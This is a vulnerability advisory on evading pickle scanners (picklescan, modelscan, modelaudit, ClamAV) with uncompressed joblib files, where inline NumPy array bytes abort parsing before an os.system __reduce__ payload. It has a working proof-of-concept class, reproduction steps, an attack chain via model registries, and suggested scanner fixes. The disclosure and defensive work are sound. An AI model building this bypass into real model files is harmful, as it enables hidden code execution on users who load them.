# Joblib Scanner Bypass via Inline NumPy Array Bytes

## Summary

A malicious `.joblib` file containing an `os.system` RCE payload achieves **0/4 scanner detection** (picklescan, modelscan, modelaudit, ClamAV (local)) while executing arbitrary commands on `joblib.load()`. The evasion requires no payload obfuscation: the dangerous `os.system` global is present in plaintext opcodes, but scanners never reach it because inline raw NumPy array bytes cause a mid-stream parse failure that all four scanners treat as "clean."

**Affected scanners:** picklescan 1.0.4, modelscan 0.8.8, modelaudit 0.2.45, ClamAV 1.5.2
**Affected format:** Joblib (`.joblib`), uncompressed, standard format
**Impact:** Arbitrary code execution at model load time, bypassing the ProtectAI safety scan
**Environment:** Python 3.14.5, joblib 1.5.3, numpy 2.4.6, scikit-learn 1.8.0

## Vulnerability

### Root Cause

joblib's `NumpyPickler` serializes NumPy arrays by writing raw array bytes **inline in the pickle stream**, between standard pickle opcodes. joblib's `NumpyUnpickler` knows how to consume these bytes (it overrides the `BUILD` opcode handler to call `wrapper.read_array()`, which advances the file cursor). However, pickle scanners use `pickletools.genops` or equivalent opcode walkers that are **not aware** of these inline raw bytes. When the scanner hits a raw float/int byte mid-stream, it misinterprets it as a pickle opcode, fails with a `ValueError`, and **silently returns "clean"** instead of flagging the parse failure.

If an attacker places a malicious `__reduce__` object **after** a NumPy array in pickle traversal order, the scanner aborts before reaching the malicious opcodes. The loader processes the entire file correctly and executes the payload.

### Attack Requirements

1. A pickle container (tuple, list, dict, or nested) serialized via `joblib.dump`
2. At least one NumPy ndarray (any dtype, ≥1 element) positioned **before** the malicious object in pickle traversal order
3. A malicious object with `__reduce__` returning a dangerous callable (e.g., `os.system`)

### Why This Is Not the Known Joblib Compression Bypass

The previously reported joblib bypass (PickleCloak Appendix B.1) involves **compressed** joblib files where the compression magic bytes at position 0 cause scanners to fail immediately. This bypass uses **uncompressed, standard-format** joblib files. The parse failure occurs **mid-stream** due to inline NumPy array bytes, not at the start of the file. The mechanism is fundamentally different.
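
The difference in failure position can be illustrated with the standard library. In this sketch a zlib-compressed pickle stands in for a compressed joblib file, and a hand-assembled stream stands in for the uncompressed inline-bytes case. Both are simplified assumptions rather than real joblib output, and `opcodes_before_failure` is a hypothetical helper.

```python
import pickle
import pickletools
import struct
import zlib


def opcodes_before_failure(data: bytes) -> int:
    """Count the opcodes a walker parses before it raises (or finishes)."""
    count = 0
    try:
        for _ in pickletools.genops(data):
            count += 1
    except ValueError:
        pass
    return count


plain = pickle.dumps(("weights", "bias"), protocol=2)

# Compressed case: the zlib header byte 0x78 is not a pickle opcode,
# so the walker fails on the very first byte of the file.
compressed = zlib.compress(plain)

# Inline-bytes case: valid opcodes, then raw float64 bytes, then more opcodes.
inline = (
    pickle.PROTO + b"\x02" + pickle.MARK
    + pickle.BINUNICODE + struct.pack("<I", 7) + b"weights"
    + struct.pack("<d", 1.0)
    + pickle.TUPLE + pickle.STOP
)

print(opcodes_before_failure(compressed))  # failure at the start of the stream
print(opcodes_before_failure(inline))      # failure only after valid opcodes
```

A check that only inspects the first bytes of a file would reject the compressed stand-in but would see a well-formed pickle header in the inline case.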

## Files

| File | Description |
|------|-------------|
| `malicious_model.joblib` | PoC: fitted LinearRegression + malicious CustomLR in a tuple. 648 bytes. |
| `poc_generate.py` | Generates the malicious `.joblib` file |
| `poc_verify.py` | Scans with all scanners and loads to confirm RCE |
| `generalized_poc.py` | 8 additional variants proving generalization (no sklearn needed) |

## Reproduction

### Step 1: Install dependencies

```bash
pip install joblib numpy scikit-learn picklescan modelscan modelaudit fickling
```

### Step 2: Generate the PoC (or use the provided `malicious_model.joblib`)

```bash
python poc_generate.py
```

### Step 3: Scan and observe that all scanners report clean

```bash
picklescan --path malicious_model.joblib
# Expected: 0 infected files, 0 dangerous globals

modelscan -p malicious_model.joblib
# Expected: No issues found

python -c "
from modelaudit.core import scan_model_directory_or_file
result = scan_model_directory_or_file('malicious_model.joblib')
print('malicious:', result.get('malicious', False))
print('verdict:', result.get('pickle_verdict', False))
"
# Expected: malicious: False, verdict: False
```

### Step 4: Load and observe code execution

```bash
python -c "import joblib; joblib.load('malicious_model.joblib')"
# Expected output includes: This is a malicious payload!
```

### Step 5: Verify with controls

```bash
python poc_verify.py
# Runs full matrix: bypass cases (clean) vs control cases (detected)
```

## Scanner Results

### Bypass case: `(fitted_LinearRegression, malicious_CustomLR)`

| Scanner | Version | Verdict | Detects `os.system`? |
|---------|---------|---------|---------------------|
| picklescan | 1.0.4 | **0 infected** | No (parse aborts before reaching REDUCE) |
| modelscan | 0.8.8 | **No issues found** | No (parse aborts silently) |
| modelaudit | 0.2.45 | **malicious: False** | No (logs WARNING but verdict stays safe) |
| fickling | 0.1.11 | LIKELY_OVERTLY_MALICIOUS | No (flags NumpyArrayWrapper, which fires on ALL fitted joblib files, including benign ones) |
| ClamAV | 1.5.2 | **CLEAN** | No (signatures gated on ZIP/torch container) |

### Control case: `(malicious_CustomLR, fitted_LinearRegression)` (reversed tuple order)

| Scanner | Version | Verdict | Detects `os.system`? |
|---------|---------|---------|---------------------|
| picklescan | 1.0.4 | **Dangerous** | Yes (REDUCE precedes array bytes) |
| modelscan | 0.8.8 | **No issues found** | No (modelscan is fail-open even when a dangerous global was already observed) |
| modelaudit | 0.2.45 | **CRITICAL** | Yes (REDUCE precedes array bytes) |

Note: modelscan appears fail-open on parse abort regardless of prior findings. This is a separate issue.

## Generalization

The bypass does NOT require scikit-learn, fitted models, or any specific container shape. Minimal example:

```python
import numpy as np
import joblib


class Detonator:
    def __reduce__(self):
        # Called at dump time; the returned callable runs at load time.
        import os
        return (os.system, ('echo PWNED',))


# Any numpy array before the malicious object triggers the bypass
joblib.dump((np.array([1.0]), Detonator()), 'minimal_bypass.joblib')

# Scanners: clean. Loader: executes 'echo PWNED'
```

Tested container shapes (all bypass 4/5 scanners):
- `(np.array([1.0]), Detonator())`
- `[np.array([1.0, 2.0, 3.0]), Detonator()]`
- `{"data": np.array([1.0]), "evil": Detonator()}`
- `{"outer": (np.array([1.0]), Detonator())}`
- `(np.zeros(10, dtype=np.int64), Detonator())`
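
What these shapes share is traversal order: the pickler emits the array's opcodes before the payload's. The sketch below checks that ordering with the standard library only. `ArrayStandIn` and `BenignPayload` are hypothetical placeholders (no NumPy, and `print` instead of `os.system`), and `global_order` is an illustrative helper, not part of any scanner.

```python
import pickle
import pickletools


class ArrayStandIn:
    """Hypothetical placeholder for a NumPy array."""

    def __reduce__(self):
        return (bytearray, ())


class BenignPayload:
    """Stand-in for the malicious object; references print, not os.system."""

    def __reduce__(self):
        return (print, ("payload ran",))


def global_order(container) -> list:
    """Return GLOBAL opcode arguments in the order the pickler emits them."""
    # Protocol 2 without import fixing keeps plain GLOBAL opcodes.
    data = pickle.dumps(container, protocol=2, fix_imports=False)
    return [arg for op, arg, _pos in pickletools.genops(data) if op.name == "GLOBAL"]


shapes = [
    (ArrayStandIn(), BenignPayload()),
    [ArrayStandIn(), BenignPayload()],
    {"data": ArrayStandIn(), "evil": BenignPayload()},
    {"outer": (ArrayStandIn(), BenignPayload())},
]
orders = [global_order(shape) for shape in shapes]
# Reversed order, analogous to the control case.
control_order = global_order((BenignPayload(), ArrayStandIn()))

for order in orders:
    print(order)
print(control_order)
```

In every bypass shape the payload's global follows the array stand-in. In the reversed tuple it comes first, which matches the control case where picklescan and modelaudit do detect the payload.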

## Real-World Impact

This bypass applies to any fitted scikit-learn model saved with `joblib.dump`. A fitted model contains NumPy arrays (the learned coefficients), which produce inline raw bytes. A realistic attack proceeds as follows:

1. The attacker takes a legitimate fitted sklearn model
2. The attacker bundles it with a malicious `__reduce__` object in a tuple
3. The attacker uploads the file to HuggingFace or any model registry
4. ProtectAI's ModelScan reports "No issues found"
5. The victim downloads the file and calls `joblib.load()`, resulting in RCE

## Suggested Fixes

### For scanner maintainers (picklescan, modelscan, modelaudit):

1. **Fail-closed on parse abort.** Any `pickletools.genops` mid-stream exception should be treated as CRITICAL/suspicious, not silently clean.
2. **Format-aware parsing.** Recognize `joblib.numpy_pickle.NumpyArrayWrapper` in the opcode stream and consume the documented inline-bytes region instead of interpreting raw array bytes as opcodes.
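
A minimal sketch of the fail-closed behavior from item 1, assuming a scanner built on `pickletools.genops`. The names `ScanResult`, `scan_fail_closed`, and `DANGEROUS_GLOBALS` are hypothetical, the denylist is deliberately tiny, and only the `GLOBAL` opcode is inspected (a real scanner would also need to handle `STACK_GLOBAL` and others). The test streams are hand-assembled and are never unpickled.

```python
import pickle
import pickletools
from dataclasses import dataclass, field

# Illustrative denylist only; a real scanner needs a far broader policy.
DANGEROUS_GLOBALS = {"os system", "posix system", "nt system"}


@dataclass
class ScanResult:
    verdict: str  # "clean", "dangerous", or "unparseable"
    findings: list = field(default_factory=list)
    error: str = ""


def scan_fail_closed(data: bytes) -> ScanResult:
    findings = []
    try:
        for opcode, arg, _pos in pickletools.genops(data):
            if opcode.name == "GLOBAL" and arg in DANGEROUS_GLOBALS:
                findings.append(arg)
    except Exception as exc:
        # A parse abort is never "clean": keep earlier findings and
        # report that the remainder of the stream was not verified.
        verdict = "dangerous" if findings else "unparseable"
        return ScanResult(verdict, findings, str(exc))
    return ScanResult("dangerous" if findings else "clean", findings)


raw = b"\x00" * 8  # stand-in for inline array bytes
prefix = pickle.PROTO + b"\x02" + pickle.MARK
evil = pickle.GLOBAL + b"os\nsystem\n"
suffix = pickle.TUPLE + pickle.STOP

bypass_result = scan_fail_closed(prefix + raw + evil + suffix)
control_result = scan_fail_closed(prefix + evil + raw + suffix)
benign_result = scan_fail_closed(pickle.dumps((1, 2), protocol=2))

print(bypass_result.verdict, control_result.verdict, benign_result.verdict)
```

Keeping the findings collected before the abort also covers the control case, where a dangerous global was seen before parsing failed.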

### For joblib maintainers:

1. Document the inline-bytes protocol so scanner authors can implement format-aware walkers.
2. Consider providing a `joblib.safe_load(path, *, allowed_globals)` analogous to PyTorch's `weights_only=True`.
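
The allowlist idea in item 2 can be sketched with the standard library's `pickle.Unpickler.find_class` hook. This is not joblib code: `AllowlistUnpickler` and `safe_loads` are hypothetical names, the sketch operates on plain pickle bytes, and a real `joblib.safe_load` would presumably need the same check inside joblib's own unpickler. The payload here references `print` as a harmless stand-in.

```python
import collections
import io
import pickle


class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that resolves only explicitly allowed (module, name) pairs."""

    def __init__(self, file, allowed_globals):
        super().__init__(file)
        self._allowed = frozenset(allowed_globals)

    def find_class(self, module, name):
        if (module, name) not in self._allowed:
            raise pickle.UnpicklingError(f"global '{module}.{name}' is not allowed")
        return super().find_class(module, name)


def safe_loads(data: bytes, *, allowed_globals=()):
    return AllowlistUnpickler(io.BytesIO(data), allowed_globals).load()


class BenignPayload:
    def __reduce__(self):
        return (print, ("payload ran",))


# An allowed global loads normally.
allowed = {("collections", "OrderedDict")}
restored = safe_loads(pickle.dumps(collections.OrderedDict(a=1)), allowed_globals=allowed)

# A global outside the allowlist is rejected before it can be called.
try:
    safe_loads(pickle.dumps(BenignPayload()), allowed_globals=allowed)
    blocked = False
except pickle.UnpicklingError:
    blocked = True

print(restored, blocked)
```

Because the check runs in the loader rather than in a separate scanner, it does not depend on the scanner parsing the stream the same way the loader does.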